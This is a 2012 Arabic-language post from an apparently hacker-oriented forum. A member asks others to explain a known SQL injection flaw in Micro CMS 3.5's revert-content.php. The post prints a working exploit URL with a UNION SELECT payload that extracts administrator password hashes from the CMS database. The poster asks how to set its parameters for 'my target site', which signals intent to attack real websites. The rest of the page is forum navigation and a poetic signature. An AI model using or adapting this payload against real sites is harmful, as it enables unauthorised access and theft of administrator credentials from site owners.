يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

 
 
أدوات الموضوع انواع عرض الموضوع
قديم 10-24-2012, 05:30 AM   رقم المشاركة : 1
معلومات العضو
tiger_romnci
 
إحصائية العضو






tiger_romnci غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
tiger_romnci is on a distinguished road

افتراضي رجاء شرح استغلال Micro CMS 3.5 (revert-content.php)


بسم الله الرحمن الرحيم


انا كنت عملت موضوع سالت فيه عن استغلال السغرة

Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability

ولكن يبدو اني قد اخطاءت في طريقة السوال

فان اقصد

شرح الاستغلال مثال


http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SE LECT%20null,null,SUBSTRING(administrators_pass,1,1 6),null,null%20FROM%20microcms_administrators/*
================================================== ================================================== ================================================== ======================================

هذا هو الاستغلال
site.com= الموقع المصاب

فماذا يقصد ب
newest=؟

او بمعني اخر كيفيتة تريكب السغرة

ارجو اضافة موقع علي الثغرة

وكافة المتغيرات بحيث استطيع فهم السغرة ووضع متغيرات موقعي المستهدف

وشكرا لكم
التوقيع

لم أفعل شئ !!!
غير أنني اعترفت بالحقيقة التي يخاف منها الجميع أنا لست بفارس أحلامك
ولم أكون لي لحظة فارس احلام حتى لقصة خيالية لا يتجرأ قارئ على المخاطرة بقرائتها
انا الذي فقدته الايام وحذفته من حساباتها
انا المعتوه بقصص التاريخ وعلى حجارة الاساطير
انا الذي صدقت بان هناك أخ وهناك حمية وهناك شئ أسمه الانسانية
انا الذي اعترفت بان لي خطية بانني ولدت بعصر يقدس الهوي

http://desmond.imageshack.us/Himg17/...ng&res=landing

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 11:03 AM


[ vBspiders.Com Network ]